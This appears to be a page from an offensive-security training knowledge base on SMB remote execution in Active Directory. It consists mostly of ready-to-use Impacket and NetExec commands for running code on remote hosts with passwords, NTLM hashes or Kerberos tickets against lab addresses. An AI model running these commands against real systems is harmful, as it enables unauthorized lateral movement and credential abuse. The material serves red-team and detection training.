Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / SMB / Techniques

Remote Execution

SMB remote execution requires administrative access on the target. The tools differ mostly by how they create the process and what artifacts they leave: service creation, WMI/DCOM activity, scheduled tasks, file drops, or SMB output channels.

psexec.py

psexec.py ootw.local/Administrator:'Password123!'@10.10.10.201
psexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
psexec.py -k -no-pass ootw.local/Administrator@ws01.ootw.local -dc-ip 10.10.10.200

wmiexec.py

wmiexec.py ootw.local/Administrator:'Password123!'@10.10.10.201
wmiexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
wmiexec.py -k -no-pass ootw.local/Administrator@ws01.ootw.local -dc-ip 10.10.10.200

smbexec.py

smbexec.py ootw.local/Administrator:'Password123!'@10.10.10.201
smbexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH

atexec.py

atexec.py ootw.local/Administrator:'Password123!'@10.10.10.201 "whoami /all"
atexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH "ipconfig /all"

NetExec

nxc smb 10.10.10.201 -d ootw.local -u Administrator -p 'Password123!' -x "whoami /all"
nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH -x "whoami /all"
nxc smb 10.10.10.201 -d ootw.local -u Administrator -p 'Password123!' --exec-method wmiexec -x "hostname"

Admin check

nxc smb 10.10.10.0/24 -d ootw.local -u Administrator -p 'Password123!'
nxc smb 10.10.10.0/24 -d ootw.local -u Administrator -H NTLM_HASH

Notes

  • psexec.py is reliable but loud.
  • wmiexec.py often has fewer service-drop artifacts but needs WMI/DCOM.
  • atexec.py is useful for one-shot commands.
  • Pick the method based on the lab goal and telemetry being taught.